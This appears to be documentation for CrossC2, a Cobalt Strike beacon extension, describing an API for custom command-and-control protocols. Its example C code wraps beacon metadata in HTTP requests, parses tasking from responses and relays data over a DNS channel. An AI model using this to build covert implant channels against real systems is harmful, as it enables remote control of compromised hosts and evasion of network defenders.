Custom communication protocol
CrossC2 reserves the communication protocol API, which can be specified to implement c2profile settings and custom protocols.
Instructions
After writing the corresponding communication protocol implementation, use gcc/clang test.c -fPIC -shared -o lib_rebind_test.so to compile and generate a dynamic library.
When generating a beacon, the rebind_dynamic_lib option in cna or genCrossC2 specifies the dynamic library just generated lib_rebind_test.so, and the last generated beacon will send communication packets according to the protocol implementation in the specified dynamic library.
HTTPs communication template modification
Corresponding to the 4 setting options in C2Profile
http-get {
client(send) { metadata{} }
server(recv) { output{} }
}
http-post {
client(send) {
id {}
output {}
}
server(recv) { output{} }
}
void (*cc2_rebind_http_get_send)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_get_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_send)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
cc2_rebind_http_x_send Series functions:
Encapsulate the incoming base64(metadata) data and return the complete HTTP structure data
`*reqData` Is the data to be requested after base64(metadata field) - C2Profile http-get { client { (metadata) } }
`**outputData` Return the actual HTTP content that needs to be sent
cc2_rebind_http_x_recv Series functions:
Parse the incoming HTTP structure data and return the base64(output) data
`*resData` Is the complete HTTP content returned by the server
`**outputData` Returns the actual content contained in the HTTP content (output field after base64 encoding) -C2Profile http-get {server {(output)}}
Communication protocol customization
void (*cc2_rebind_get_protocol)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_post_protocol)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
cc2_rebind_x_protocol Series functions:
After the incoming original data is sent to and received from the custom communication, the obtained base64(output) data is returned
`*resData` Is the data to be requested after base64 (metadata field / id + output field)
`**outputData` It is the server response data(output field) after base64
Ex:
HTTPs communication template customization:
void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
printf("------ custom http get send ------\n");
char *requestTample = "GET /%s HTTP/1.1\r\n"
"Host: http.cc2.com\r\n"
"Accept: gzip, deflate\r\n"
"User-Agent: cc2_rebind_http_get_send\r\n"
"Cookie: %s\r\n"
"Connection: cc2_rebind_http_get_send\r\n\r\n";
char postPayload[20000];
sprintf(postPayload, requestTample, "test", reqData);
// Write the generated HTTP data to outputData
*outputData_len = strlen(postPayload);
*outputData = (char *)calloc(1, *outputData_len);
memcpy(*outputData, postPayload, *outputData_len);
printf("-------------------------\n");
}
void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
printf("------ custom http get recv ------\n");
// rawData = "HTTP/1.1 200 OK
// Date: Tue, 26 May 2020 10:12:28 GMT
// Server: CC2_server
// Content-Length: 32
// Connection: close
// Content-Type: text/html; charset=iso-8859-1
//
// XXXXZZZZXXXXAAAZZ==
char *payload = find_pay(rawData, rawData_len); // return "XXXXZZZZXXXXAAAZZ=="
*outputData_len = strlen(payload);
*outputData = (char *)calloc(1, *outputData_len);
memcpy(*outputData, payload, *outputData_len);
printf("-------------------------\n");
}
Communication protocol customization
void cc2_rebind_get_protocol(char *reqData, char **outputData, long long *outputData_len) {
printf("------ custom get protocol ------\n");
sendDNS("127.0.0.1", 53, 1, reqData, strlen(reqData), outputData, outputData_len);
if (*outputData_len > 0) {
printf("cobaltstrike cc2_server response(%d): \n", *outputData_len);
}
printf("------ custom protocol ------\n");
}